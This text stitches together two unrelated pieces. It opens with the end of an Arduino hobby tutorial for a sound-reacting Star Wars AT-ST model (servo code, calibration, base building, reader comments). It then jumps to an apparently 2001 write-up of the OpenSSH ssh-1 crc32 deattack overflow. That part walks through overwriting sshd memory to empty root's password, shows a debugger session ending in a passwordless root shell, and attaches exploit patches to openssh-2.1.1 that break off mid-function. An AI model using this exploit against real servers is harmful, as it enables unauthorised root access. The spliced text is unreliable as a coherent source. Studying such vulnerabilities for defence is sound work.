    servoSweep2 = random(1, 4);   // pick a random case between 1 and 3
    /*if (servoSweep == 7) {      // cycle through all cases
      servoSweep = 1;
    }*/
  }
  switch (servoSweep2) {
    case 1: pos = limitdx - 3; servo.write(pos); break;
    case 2: pos = limitdx - 6; servo.write(pos); break;
    case 3: pos = limitdx;     servo.write(pos); break;
  }  // end of sweep
}

void AfraidSx() {
  if (millis() >= previousMillis4) {
    CountCiclo4++;
    previousMillis4 = previousMillis4 + random(StartVelocityCiclo4, EndVelocityCiclo4);
    servoSweep4 = random(1, 4);   // pick a random case between 1 and 3
  }
  switch (servoSweep4) {
    case 1: pos = limitsx + 3; servo.write(pos); break;
    case 2: pos = limitsx + 6; servo.write(pos); break;
    case 3: pos = limitsx;     servo.write(pos); break;
  }  // end of sweep
}

void LedLoop() {
}

void Scan() {
  if (millis() >= previousMillis3) {
    if (endingAfraid == 1) {      // if leaving an afraid mode, reset the position for a smooth resume
      endingAfraid = 0;
      if (Direction == 0) {
        previousMillis3 = previousMillis2;
        pos3 = limitdx - 6;
      } else {
        previousMillis3 = previousMillis4;
        pos3 = limitsx + 6;
      }
    }
    CountCiclo3++;
    //debug// Serial.println(pos3);
    previousMillis3 = previousMillis3 + VelocityCiclo3;

    if (Direction % 2) {          // odd: sweep from the left limit to the right limit
      if (pos3 < limitdx) {
        pos3++;
        servo.write(pos3);
      } else {
        Direction++;              // limit reached: increment Direction, reversing the sweep
      }
    } else {                      // even: sweep from the right limit to the left limit
      if (pos3 > limitsx) {
        pos3--;
        servo.write(pos3);
      } else {
        Direction++;              // limit reached: increment Direction, reversing the sweep
      }
    }
  }
}

void DetectNoise() {
  if (millis() >= previousMillis6) {
    CountCiclo6++;                // once every VelocityCiclo6 ms...
    previousMillis6 = previousMillis6 + VelocityCiclo6;
    // ...check whether too many knocks (dx and sx) have accumulated
    if (PreviousKnockDetected <= KnockDetected) {
      // too many knocks within one slow cycle: it is continuous noise, not a trigger
      PreviousKnockDetected = KnockDetected + NoiseTresh;  // NoiseTresh = margin added for the next check
      Serial.println();
      Serial.println("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!noise detected!!! chi parla?????????????????");
      Serial.println();
      Behaviour = 1;              // go back to scan mode
      NoiseDetected = 1;          // prevents further knocks from changing the behaviour for a while
      previousMillis7 = previousMillis6 + VelocityCiclo7;  // set the delay for resetting NoiseDetected
}else{ if (millis() >= previousMillis7){ //dopo xx ulteirori millisecondi.. CountCiclo7++; NoiseDetected = 0; //vado via dastato di noisedetected... } } PreviousKnockDetected = KnockDetected+NoiseTresh; //debug// Serial.print("trigger rilevati in unità di tempo= "); //debug// Serial.println(PreviousKnockDetected-KnockDetected); } }
void VerboseLog() { if (millis() >= previousMillis1){ CountCiclo1++; previousMillis1 = previousMillis1+VelocityCiclo1 ; // each case gets 100ms
//fun Verboselog Serial.print("| CountCiclo1= "); Serial.print(CountCiclo1);
Serial.print("| knockDX= "); Serial.print(millisAtKnockDx);
Serial.print("PreviousKnocKDetected= "); Serial.print(PreviousKnockDetected);
Serial.print("KnocKDetected= "); Serial.print(KnockDetected); Serial.print("NoiseDetectedStatus= "); Serial.print(NoiseDetected);
Serial.println("end");
}
}
Attachments
Step 10: Calibrating
As you code is uploaded you should see this thing working for the first time!
I suggest not to attach the head before checking the servo center position.
The servo Should be swiping form left to right.
Calibrating the servo
You must set (in Arduino code) your limits and center position by setting these variables:
- int center = 115;
- int limitsx = 85;
- int limitdx = 145;
NOW you can assemble the head...
...with the rest of the body, at the center servo position.
Consider not to use glue for this. If you need to use glue, be extremely careful not to weld the servo and cause it to get stuck.
Calibrating the Microphones.
Microphones has one screw on ht little board on with there mounted. This is to set the threshold limit after the Sensor tell to the arduino that a sound is detected.
You now have to find the exact threshold for each of the two.
You can achieve this by reading the monitor on the serial log on the ARDUINO IDE. Anytime a sound is detected you'll read "Knock SX !!!!!!!!!!!" or "Knock DX !!!!!!!!!!!"
If there is to much noise to trigger the pics, the "Detect noise" function will ignore the call and consider it a "noise".
Find the correct balance.
Step 11: Build the Base
Speaking about base building, there is no right way to do it as long as:
- you get the room for the batteries the electronics, the power switch
- you provide A way to keep the At-st standing on its feet
- you get the 2 microphones onto the base, one on the left, and one on the right.
Here is my way:
- Find what you want to do (studied the positions before)
- 3d print the external mould (dimensions will fit Makerbot replicator 2) (file attached)
- 3d print the Inner core (file attached)
- Cover the inner core cavities. You don't want the plaster to go inside.
- Fix the External Mould to a Wooden base.
- Position the inner core and put a weight on it (otherwise il will float into plaster).
- Prepare the plaster
- Pour the plaster into the mould
Let it dry ( for some days )
Step 12: Complete the Work
Build the final circuit
You can see above the final Fritzing circuit. As said before it has 2 batteries to solve the interference problem.
In the diagram you can see 6 leds that are supposed to light up the base. These are optional.
Do all the soldering required. And Weld all the components to the Arduino Nano.
I used this wonderful frontal Metal Led button. Check its instructions to wire it correctly.
Set the Model to the base Using 2 screws form below the base and join the wires.
Install the microphones
My base design has forced me to get to the surface of the base only with the 2 mics, and not with the entire sound detection board. So i had to Stretch the Mics wiring.To do it i detached the mic form its board and re-soldered using the two 20 cm Cd-rom audio cabled (they are shielded).
After that i put some rocks on it to conceal the two mics. And painted all in white (i know that it's an unpopular diorama design, but i like it this way)
Power it up & Enjoy it!
Be the First to Share
Recommendations
29 Comments
1 year ago
Awesome!!! Thanks for sharing... Just came across it recently, doing a build currently... Using this specific micromotor with gears from Faulhaber instead of regular servo... Fits right in the back panel, without damaging the interiors...
5 years ago
Hi. Very cool. Starting to build one using your base mould but not sure how the far plaster should go inside. Do tyou have any pictures of the process?
Thanks
5 years ago
I just ordered an arduino kit, and will be learning the ins and outs of it. My goal for this learning project is to build one of these! I build maquettes already, and can't wait to work on this! Thanks so much for sharing your knowledge!
6 years ago
You have to put that in a creepy doll....have to.
6 years ago
Is there a video of thefinal or did I just miss it?
Reply 6 years ago
Reply 6 years ago
thx
Reply 6 years ago
your welcome! i was searching for a video throughout the steps as well....This instructable is too cool not to see in action.
6 years ago
Nice arduino project, and I LOVE your battle-scars too :-)
6 years ago
The battle damage and paint job you did on this are amazing.
6 years ago
AWESOME!! Thank you for this I have this kit and was about to start building it also a fan of Tony's work "Helgan35", I had planned to just add some lighting to it but now I have to try and do this, I have a display case in living room near front door so this is a must do to have it turn towards people as they walk in EPIC...
Reply 6 years ago
yeah Helgan35 is the best! like his videos... and skills.
Reply 6 years ago
Just ordered the parts needed to do this went with free shiping on it all to save cost but will have all before christmas and plan on making this while on vacation from 12/24 though the 1/4 cant wait to have it looking at people as the walk in my place :) would like to add laser firing effect as well but not sure how to with andrino yet this is my 1st attempt at it
6 years ago
Can I replace servo with a stepper motor? I was able to connect to an L298N controller and got to work but I was unable to get microphones to work. Is there an Arduino sketch that will allow me to use both stepper motor and 2 sound sensors?
Thank you.
Reply 6 years ago
Sure, you can use a stepper motor if you get it to fit inside...
obiouvlsy my sketch wont work as it is. Has to be modified.
Into another project i made i successfully used this stepper driver:
Reply 6 years ago
Thank you. Great info and very helpful.
Reply 6 years ago
... follow this to add stepper driver code....
i hope i've been helpful!
6 years ago
Wow dude! this is very fitting for the fact that the new Star Wars film is coming out soon!
6 years ago
This masterpiece!
6 years ago
A lot of effort and a great result. Congrats. | https://www.instructables.com/Motorized-Sound-reacting-Star-Wars-At-St-Bandai-Mo/ | CC-MAIN-2022-05 | refinedweb | 4,223 | 61.06 |
1. Abstract
-----------
This article discusses the recently discovered security hole in the
crc32 attack detector as found in common ssh packages like OpenSSH and
derivatives using the ssh-1 protocol. There is a possible overflow during
the assignment from a 32-bit integer to a 16-bit one, leading to unmasked
hash table indexes.
In this article I will try to show how to:
a) exploit the crc32 hole to gain remote access to accounts without
providing any password, assuming the remote sshd allows empty passwords
b) change the login uid if a valid account on the remote machine exists.
I'm aware of the wide consequences arising from this disclosure and
possibly some people will hate me because I wrote this, but after you
have read this article, you will see that the exploitation is really
hard and tricky but on the other hand interesting. I think that the
impact of the crc32 hole is greater than the recent bind bug. I'm not
responsible for any damage resulting from this code if you use it on
your own.
The exploit code is a set of patches to openssh-2.1.1, but of course one
may want to put the needed routines into a single code file.
Note: this is neither a typical buffer overflow exploit (shell code) nor
a format string exploit :-)
2. Details
----------
Let's look at the vulnerable code in deattack.c. I will derive a few
conclusions about the exploitation of the deattack code here.
Original deattack.c code taken from OpenSSH-2.1.1; interesting
locations are marked with [n]:
int
detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
static u_int16_t *h = (u_int16_t *) NULL;
static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
register u_int32_t i, j;
u_int32_t l;
register unsigned char *c;
unsigned char *d;
if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
len % SSH_BLOCKSIZE != 0) {
fatal("detect_attack: bad length %d", len);
}
[1]
for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
;
if (h == NULL) {
debug("Installing crc compensation attack detector.");
[2] n = l;
h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
} else {
if (l > n) {
n = l;
h = (u_int16_t *) xrealloc(h, n * HASH_ENTRYSIZE);
}
}
if (len <= HASH_MINBLOCKS) {
for (c = buf; c < buf + len; c += SSH_BLOCKSIZE) {
if (IV && (!CMP(c, IV))) {
if ((check_crc(c, buf, len, IV)))
return (DEATTACK_DETECTED);
else
break;
}
for (d = buf; d < c; d += SSH_BLOCKSIZE) {
if (!CMP(c, d)) {
if ((check_crc(c, buf, len, IV)))
return (DEATTACK_DETECTED);
else
break;
}
}
}
return (DEATTACK_OK);
}
memset(h, HASH_UNUSEDCHAR, n * HASH_ENTRYSIZE);
if (IV)
h[HASH(IV) & (n - 1)] = HASH_IV;
for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
[3] for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
i = (i + 1) & (n - 1)) {
if (h[i] == HASH_IV) {
if (!CMP(c, IV)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
[4] } else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
}
[5] h[i] = j;
}
return (DEATTACK_OK);
}
[2] as we see here, a 32-bit int value is assigned to an only 16-bit
wide one. Bad things happen if n is assigned a (truncated) value of 0,
because the value of n-1, where n expands to 32 bits before the
calculation is made, is used as the bit mask for the following hash table
operations [3]. Because l is computed to be a power of 4 in [1], we do
not need to know the exact value of the len argument of detect_attack. We
will end up with n being exactly 0 if len is big enough. The overflow
happens at roughly LEN = (16384 / HASH_FACTOR) * SSH_BLOCKSIZE, which is
87381.
So now we know how to set n to 0: simply send an ssh-1 packet with a size
exceeding LEN. But are we able to send such long packets? The answer is
yes; after looking at the packet handling code in packet.c we see that
the maximum accepted packet length is 256 kbytes.
But what can we do with this? The answer is simple: after the value of n
has been set to 0, we can access all of sshd's memory by providing
out-of-range hash indexes, which are taken as (network order) values from
the packet buffer itself (due to the HASH function being a simple
GET_32BIT); the values stored in the table are 'unsigned short' block
indexes. The detect_attack code will scan 8-byte-long blocks, checking
them for the crc32 attack using only the first 4 bytes of each block as
the hash table index. So we can set the other half of the buf blocks to
arbitrary values without consequences for what we are indexing.
So having n=0 we can change really any value in memory! For example,
to write to a variable X holding the value V, we need to supply the Vth
buf block with an offset to X in the server's memory, an offset because
it is calculated relative to the value of 'h', which has been
allocated by a call to xm(re)alloc(). The value of h has indeed to be
guessed, though (or in other words we need to guess the offset to h).
But this alone would only write V to X, because 'j', the value we
write in [5], counts blocks in buf. As you see from [3] and [4] there is
a condition for writing to memory: the block number V has to be
identical to the block obtained by buf + h[i] * 8, which means that we
need 2 blocks: first a 'self-termination' block with the number V and
another block with the number 'k', where k is the new value we want to
write to X. Note that with this technique we can only increase the value
of X!
There are 2 other conditions, the UNUSED_HASH and the HASH_IV condition,
though I do not discuss them here.
Let's analyse the conditions we need to enter the detect_attack code at
all. From packet.c it can be seen that we need the session key to be set,
so the first possibility to enter detect_attack is after the ssh_kex code
in auth1.c. This makes the exploitation a bit tricky, because we need to
send encrypted packets.
So one may ask: how do we send an encrypted packet containing the needed
offsets if we must always encrypt our data before sending? We can deal
with it easily by maintaining a copy of the receive context as sshd sees
it. After the session key has been set (it is the same for sending and
receiving) we need to _decrypt_ all packets we send to sshd. With this
trick we are able to produce the plaintext needed for the construction of
the desired encrypted packet :-)
Let us look at the format of ssh-1 packets. They are always 8*n bytes
long (packets containing other data amounts are padded) and contain an
(encrypted!) checksum at the end of the packet:
(LEN)[001][002][003][004]...[XXX]
where [...] stands for a 8-byte long block and (LEN) is a 32 bit value
carrying the length information (network order!). The last [XXX] block
would be like
[PPPPCCCC]
with P standing for padding or data and C for the crc32 checksum. The
checksum is calculated over all packet bytes _excluding_ the checksum
location but including the last 32 bits of the packet (padding or data),
then stored at the end of the packet, and after that the resulting packet
is encrypted with the current cipher context (usually send_context in
packet.c).
There are 2 other difficulties one can point out. The first is
that after we have sent a big packet setting 'n' in detect_attack to 0,
n will still be 0 in succeeding calls and this will result in an endless
loop in [1]. Therefore our packet _must_ overwrite the static variable n
in the detect_attack subroutine!
Because we have xrealloc'ed the buffer h with the new size =
n*HASH_ENTRYSIZE, which would expand to 0, the buffer h cannot be assumed
to point to any valid memory... So the only way to deal with this is to
send only _small_ packets matching the condition len < HASH_MINBLOCKS
(=56). For example, we have to disable tty allocation (-T option) in the
following exploit code. Never enter more than about 36 bytes at the
prompt :-)
The second really hard problem is the value of PPPP. detect_attack will
scan the buf for the crc32 compensation attack _including_ the last block
with crc and pad. But we cannot really control the encrypted value of P,
because the ciphers always work on 8-byte-long blocks, mixing the 2
32-bit values with each other (I didn't find any simple way to deal with
this; cryptography experts, where are you?!). So the question is: what do
the PPPP bytes have to be in order to obtain a defined encrypted value at
P's position _after_ we have calculated the checksum? I doubt that this
problem is solvable at all. However, at this point I use the UNUSED_HASH
termination condition. After n has been set again by our big packet to a
value != 0, we need to match the condition h[PPPP & (n-1)] == 0xffff. See
below to understand how I'm doing this ;-)
So now we know all about the detect_attack code and the packet format;
let's think about really exploiting this. After looking at the
authorization code in auth1.c I found 3 possible ways of exploitation in
the do_authloop function:
a) there is a local variable 'int authenticated = 0' which, set to a
value != 0, would authorize the session and start a remote shell
immediately.
b) overwriting the pw->pw_passwd value, which should be 'x'\000 on
systems with shadow passwords, with something like \000'x' would produce
a remote shell too if sshd has 'emptypasswords' enabled.
c) overwriting pw->pw_uid with some value would change the uid the
remote shell runs under after successful authentication.
You will figure out very fast why (a) is not easily exploitable (if at
all...).
It is time to describe an exploitation path for (b), which I decided to
choose for this article. Exploiting (c) would be similar but not really
interesting, I think, because we can only increment the uid value.
Let's summarize how our (very very...) magic big packet has to look:
- we put as the first cipher block an offset pointing to the location of
n in detect_attack(), so the first write h[i]=j will set n=0
- we make the 0x78th block point to the location of pw->pw_passwd
(which points to something like 0x78 0x00 ... at this time); this is our
termination block for pw->pw_passwd. Its h[i]=j won't change the value
pw->pw_passwd is pointing to
- we make the 0x100th block point to pw->pw_passwd again, so that
h[i]=j changes the value *(pw->pw_passwd) to be 0x00 0x01
(which is an empty string, i.e. no password :-)
- the 512th cipher block has to change n in detect_attack() to be 512 so
no deadlock occurs in succeeding calls to detect_attack().
- other cipher block offsets have to be 0x00000000.
- and finally we choose the last free (padding) value PPPP of the packet
to match the following condition: network_order(PPPP) & 511 == 0 (brute
force that; PPPP will be found very fast...) so that we still have an
_effective_ offset of 0x00000000. After I played a bit with this, I found
that it is not really necessary to bother about PPPP...
There are a few other modifications to the ssh code, though. I mention
only that before we send our magic big packet there will be a
'0xffff-setting' packet, only to set up the h buffer with 0xffff values
;-)
Another modification I made is sending an empty password after we have
sent the long packet in sshconnect1.c. You will find the other minor
changes yourself...
3. Exploit
----------
Attached are diff files for the openssh-2.1.1 package. The patch uses 2
environment variables called 'OFF' and 'NOFF', where OFF has to be the
offset to the variable we want to overwrite (pw->pw_passwd) and NOFF the
offset to the static variable 'n' in the detect_attack code.
To finish this discussion let's look at a successful exploitation of
sshd. I have run sshd in gdb in debugging mode to simplify this show,
but you can try the code with your own 'real' sshd of course, using
appropriate offsets...
on the client side:
./ssh -v -p 7777 localhost 2>&1 -c blowfish -T -l root
where -T prevents sending the ALLOC_PTY packet, which would exceed the
56-byte limit. On the server side:
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/paul/tmp2/openssh-2.1.1p4/./sshd -p 7777 -d
-f ./sshd_config -b 512 2>&1
debug: sshd version OpenSSH_2.1.1
debug: Seeding random number generator
debug: read DSA private key done
debug: Seeding random number generator
debug: Bind to port 7777 on 0.0.0.0.
Server listening on 0.0.0.0 port 7777.
Generating 512 bit RSA key.
debug: Seeding random number generator
debug: Seeding random number generator
RSA key generation complete.
debug: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 3743
debug: Client protocol version 1.5; client software version
OpenSSH_2.1.1
debug: Local version string SSH-1.99-OpenSSH_2.1.1
debug: Sent 512 bit public key and 1024 bit host key.
debug: Encryption type: blowfish
debug: stored copy of send context
debug: Received session key; encryption turned on.
Breakpoint 1, detect_attack (
buf=0x80f9d14
"VÉzZí\236\005\035b¬I\205:I@N4c;\r\227³W\204ËÔ\022ƵlT\aO\025¡®Ë6\227+w\177úN\032@\017°$·Kë\230óCbÄ\225,_~(\bîЩl6136
if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) c
Continuing.
debug: Installing crc compensation attack detector.
debug: Attempting authentication for root.
(here I have added some debugging code to detect_attack in order to
easilly gain offsets :-)
debug: PASSWORD ADR = 0xbffff08c : 80f8890 80f9c88 0
debug: passwd = [x]
debug: name = [root]
Breakpoint 1, detect_attack (
buf=0x80f9d14
"q9\216\203Èac]uuE\235A\013nQ\022·\003oj8Üo+[\eë\207Xÿ®r[ó7\233\030«ß%ÏÍ·ÙRò\207l1\230y¿(\211¡\004\207\037
\027&
len=528, IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) x 0x80f9c88
0x80f9c88: 0x400c0078
As we see here, 0x400c0078 is the stored 'x'\000 value from /etc/passwd,
which indicates that root has a shadow password.
(gdb) p len
$15 = 528
the packet received is the '0xffff' packet which prepares the
memory region h with UNUSED_HASH values; ok, let's continue:
Continuing.
Unknown message during authentication: type 248
debug: Unknown message during authentication: type 248
Failed bad-auth-msg-248 for ROOT from 127.0.0.1 port 3743
ok, sshd ignored the 0xffff packet; the client side is now guessing the
value of PPPP. Let's see what happens next:
Breakpoint 1, detect_attack (buf=0x8100144 "\177þa0ÿÿÿÿ", len=88072,
IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) p len
$16 = 88072
(gdb) p n
$17 = 4096
Got the big packet! Let's step into the detect_attack code:
(gdb) n
140 for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l
<< 2)
.
.
.
(gdb) p n
$18 = 0
So now we have set n=0 and n-1 = 0xffffffff and can overwrite memory ;-)
After a few loops we check the location of pw->pw_passwd again:
(gdb) x 0x80f9c88
0x80f9c88: 0x400c0100
Oooops, root seems to have no password now! Lets run the loop a bit
longer:
(gdb) p n
$25 = 512
(gdb) p j
$26 = 785
We see that at this point we have set n back to 0x200 and can enter
detect_attack again. Let's now check the termination value for the last
iteration in [3], which has to be UNUSED_HASH (note the network order
offsets):
(gdb) x/16 buf + len - 8
0x8115944: 0xf5966c0d 0xb7ef464b 0x09000000
0xeed64f1a
0x8115954: 0x2c1b8d66 0x891bb13a 0x527c53d0
0x00000000
(gdb) x/16 &h[0x0d6c96f5 & 511]
0x80fdf1a: 0xffffffff 0xffffffff 0xffffffff
0xffffffff
0x80fdf2a: 0xffffffff 0xffffffff 0xffffffff
0xffffffff
Ok, it looks fine; let's continue the loop till the end and hope that
sshd won't die after overwriting 0x80fdf1a with the value of j at the
end of the [3] loop. It will take about 120 seconds on a P-100
machine to complete the loop (yes, I wrote this on an old P-100/64mb
:-).
(gdb) c
Continuing.
Unknown message during authentication: type 237
debug: Unknown message during authentication: type 237
Failed bad-auth-msg-237 for ROOT from 127.0.0.1 port 3747
Breakpoint 1, detect_attack (buf=0x8115950
"\032OÖîf\215\e,:±\e\211ÐS|R", len=16, IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
Oooops^2, now we have fooled sshd into believing that root doesn't have
a password set, we have set n to be != 0, and we are still alive.
SUCCESS! So it is not difficult to imagine what happens now:
(gdb) c
Continuing.
Accepted password for ROOT from 127.0.0.1 port 3747
debug: session_new: init
debug: session_new: session 0
Breakpoint 1, detect_attack (buf=0x8100144
"\030© Ñ'\233Ç*oå\021w(Ç\035v", len=16, IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
We didn't supply any password at all :-))) After continuing we get an
interactive session for root:
(gdb) c
Continuing.
Unknown packet type received after authentication: 9
Breakpoint 1, detect_attack (buf=0x8100158 "¾áBAS£øyÿÿÿÿ", len=8,
IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) c
Continuing.
debug: Entering interactive session.
debug: fd 9 setting O_NONBLOCK
debug: fd 11 setting O_NONBLOCK
debug: server_init_dispatch_13
debug: server_init_dispatch_15
On the client side we see this (no pty):
Permission denied, please try again.
debug: Requesting shell.
debug: Entering interactive session.
Environment:
USER=root
LOGNAME=root
HOME=/root
PATH=/usr/bin:/bin:/usr/sbin:/sbin
MAIL=/var/spool/mail/root
SHELL=/bin/bash
SSH_CLIENT=127.0.0.1 3747 7777
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),12(mail),14(uucp),15(shadow),16(dialout),42(trusted),100(users),101(untrusted),65534(nogroup)
That's all !'"§$!...
Now you will probably understand why the crc32 hole is very difficult
to exploit. Also, any brute force approach one may try would consume the
network bandwidth...
Nevertheless, upgrade your sshd as soon as possible :-)
ihq.
--------------------------------------------------------------------------------
ATTACHED: sshd_exploit.diff !!! DEMONSTRATION CODE, NO TROJAN, NO JOKE
!!!
--- crc32.c Thu Jun 22 13:32:32 2000
+++ patched_crc32.c Tue Feb 20 03:02:04 2001
@@ -119,3 +119,14 @@
}
return crc32val;
}
+
+unsigned int
+crc32_recursive(const unsigned char *s, unsigned int crc32val)
+{
+ unsigned int i;
+ for (i = 0; i < 4; i ++) {
+ crc32val = crc32_tab[(crc32val ^ s[i]) & 0xff] ^ (crc32val >> 8);
+ }
+
+ return crc32val;
+}
--- dispatch.c Thu Jun 22 13:32:32 2000
+++ patched_dispatch.c Tue Feb 20 03:02:18 2001
@@ -71,7 +71,8 @@
if (type > 0 && type < DISPATCH_MAX && dispatch[type] != NULL)
(*dispatch[type])(type, plen);
else
- packet_disconnect("protocol error: rcvd type %d", type);
+// packet_disconnect("protocol error: rcvd type %d", type);
+ debug("WOULD TERMINATE: type : %d", type);
if (done != NULL && *done)
return;
}
--- packet.c Tue Jul 11 01:29:50 2000
+++ patched_packet.c Tue Feb 20 03:04:16 2001
@@ -72,6 +72,12 @@
/* Encryption context for sending data. This is only used for
encryption. */
static CipherContext send_context;
+// we have to decrypt all data before sending with backup in order to be able
+// to predict the values on sshd's side
+static CipherContext backup_context;
+static char tmpbuf[1024];
+
+
/* Buffer for raw input data from the socket. */
static Buffer input;
@@ -146,6 +152,7 @@
cipher_type = SSH_CIPHER_NONE;
cipher_set_key(&send_context, SSH_CIPHER_NONE, (unsigned char *) "", 0);
cipher_set_key(&receive_context, SSH_CIPHER_NONE, (unsigned char *) "", 0);
+ cipher_set_key(&backup_context, SSH_CIPHER_NONE, (unsigned char *) "", 0);
if (!initialized) {
initialized = 1;
buffer_init(&input);
@@ -298,8 +305,69 @@
unsigned int bytes)
{
cipher_encrypt(cc, dest, src, bytes);
+
+// on ssh side we maintain a copy of remote's cipher context in order to be able
+// to decrypt our messages
+// we simply decrypt all we crypt to stay informed about what the remote side is doing with our data :-)
+ cipher_decrypt(&backup_context, tmpbuf, dest, bytes);
+
}
+// decrypts the stream as it would happen on the other side
+void
+backup_decrypt(void *dest, void *src, unsigned int bytes)
+{
+CipherContext cc;
+
+// do not modify backup context
+ cc=backup_context;
+ cipher_decrypt(&cc, dest, src, bytes);
+}
+
+void
+send_encrypt(void *dest, void *src, unsigned int bytes)
+{
+static CipherContext cc2;
+static int c=0;
+CipherContext cc;
+
+ if(c==0) {
+ cc2=send_context;
+ c++;
+ debug("frezing a copy of send_context !");
+ }
+
+ cc=cc2;
+ cipher_encrypt(&cc, dest, src, bytes);
+}
+
+void
+send_encrypt_modify(void *dest, void *src, unsigned int bytes)
+{
+ cipher_encrypt(&send_context, dest, src, bytes);
+}
+
+void
+send_encrypt_save(void *dest, void *src, unsigned int bytes, int save)
+{
+static CipherContext cc2;
+static int c=0;
+CipherContext cc;
+
+ if(c==0) {
+ cc2=send_context;
+ c++;
+ debug("frezing a copy of send_context !");
+ }
+
+ cc=cc2;
+ cipher_encrypt(&cc, dest, src, bytes);
+
+ if(save)
+ cc2=cc;
+}
+
+
/*
* Decrypts the given number of bytes, copying from src to dest. bytes
is
* known to be a multiple of 8.
@@ -346,6 +414,9 @@
/* All other ciphers use the same key in both directions for now. */
cipher_set_key(&receive_context, cipher, key, keylen);
cipher_set_key(&send_context, cipher, key, keylen);
+ debug("stored copy of send context");
+ backup_context=send_context;
+ cipher_set_key(&backup_context, cipher, key, keylen);
}
/* Starts constructing a packet to send. */
--- sshconnect1.c Tue May 9 03:03:04 2000
+++ patched_sshconnect1.c Tue Feb 20 03:01:44 2001
@@ -651,6 +651,126 @@
return 0;
}
+extern void send_encrypt(void *dest, void *src, unsigned int bytes);
+extern void send_decrypt(void *dest, void *src, unsigned int bytes);
+extern unsigned crc32_recursive(const unsigned char *s, unsigned int crc32val);
+extern void backup_decrypt(void *dest, void *src, unsigned int bytes);
+extern void send_encrypt_modify(void *dest, void *src, unsigned int bytes);
+extern void send_encrypt_save(void *dest, void *src, unsigned int bytes, int save);
+unsigned int crc32(const unsigned char *s, unsigned int len);
+
+
+// this will construct valid ssh packet, containing ignored message
+// with cipher(packet) = magic offset to write to configured offset
+// and the packet will have valid (encrypted) crc :-)
+void bigpacket()
+{
+unsigned DATALEN=1024*86;
+unsigned paddedlen=(DATALEN + 8) & ~7;
+
+unsigned char* buf;
+unsigned char* buf2, *buf3;
+
+int connection_out;
+
+unsigned* ptr, *ptr2, i, checksum, w;
+unsigned* chkp;
+
+unsigned off;
+unsigned noff;
+unsigned npos=512;
+
+
+ debug("*** writing big packet ***");
+
+ srand(time(NULL));
+
+ buf3=getenv("OFF");
+ if(!buf3) {
+ debug("please set OFF");
+ exit(1);
+ }
+
+ sscanf(buf3, "%x", &off);
+ debug("\nOFF : %x", off);
+
+ buf3=getenv("NOFF");
+ if(!buf3) {
+ debug("please set NOFF");
+ exit(1);
+ }
+
+ sscanf(buf3, "%x", &noff);
+ debug("\nNOFF : %x", noff);
+
+// alloc mem
+ buf=(unsigned char*)malloc(DATALEN+1024);
+ buf2=(unsigned char*)malloc(DATALEN+1024);
+ buf3=(unsigned char*)malloc(DATALEN+1024);
+
+ memset(buf3, 0x00, DATALEN+512);
+ memset(buf2, 0x00, DATALEN+512);
+ memset(buf, 0x00, DATALEN+512);
+
+ ptr=(unsigned*)(buf);
+ ptr2=(unsigned*)(buf2);
+
+// socket fd
+ connection_out=packet_get_connection_out();
+
+// construct plain text to get buf[k] = offset after encryption
+ for(i=0;i<paddedlen/4;i+=2) {
+ ptr2[i]=htonl(0x0);
+ ptr2[i+1]=0xffffffff;
+ }
+
+// for writing to n
+ ptr2[0]=htonl(noff);
+ ptr2[npos*2]=htonl(noff);
+
+// for writing to pw->pw_passwd
+ ptr2[256*2]=htonl(off);
+ ptr2[0x78*2]=htonl(off);
+
+// write checksum
+ chkp=(unsigned*)(buf+paddedlen);
+
+ backup_decrypt(buf+4, buf2, paddedlen-8);
+
+// message type
+ ptr[0]=htonl(DATALEN);
+
+// compute checksum
+ checksum=crc32((unsigned char *) buf+4, paddedlen-4);
+ *chkp=htonl(checksum);
+
+// buf contains decrypted plaintext!
+ send_encrypt_save(buf2, buf+4, paddedlen-8, 1);
+ checksum=crc32((unsigned char *) buf+4, paddedlen-8);
+ *(chkp-1)=((unsigned)rand());
+ w=crc32_recursive((unsigned char *) buf+4 + (paddedlen-8), checksum);
+ *chkp=htonl(w);
+
+// encrypt freeval + new crc32 and copy this into buf2
+ send_encrypt_save(buf2 + (paddedlen-8), buf+4 + (paddedlen-8), 8, 0);
+
+// now buf is ready to send (encrypted) !!!
+// modify our send_context to maintain synchronisation with the server
:-)
+ send_encrypt_modify(buf3, buf+4, paddedlen);
+ memcpy(buf+4, buf2, paddedlen);
+
+// write packet now:
+ if (atomicio(write, connection_out, buf, paddedlen+4)!=paddedlen+4)
+ fatal("write: %.100s", strerror(errno));
+
+ free(buf);
+ free(buf2);
+ free(buf3);
+
+ debug("*** wrote bigpacket ***");
+}
+
+
/*
* Tries to authenticate with plain passwd authentication.
*/
@@ -663,14 +783,32 @@
debug("Doing password authentication.");
if (options.cipher == SSH_CIPHER_NONE)
log("WARNING: Encryption is disabled! Password will be transmitted in
clear text.");
+
+// prepare 0xffff field !
+ debug("sending 0xffff packet");
+ packet_start(0xf8);
+ password=malloc(512);
+ memset(password, 0x00, 512);
+ packet_put_string(password, 512);
+ packet_send();
+ packet_write_wait();
+ free(password);
+
+ type = packet_read(&payload_len);
+ if (type == SSH_SMSG_SUCCESS)
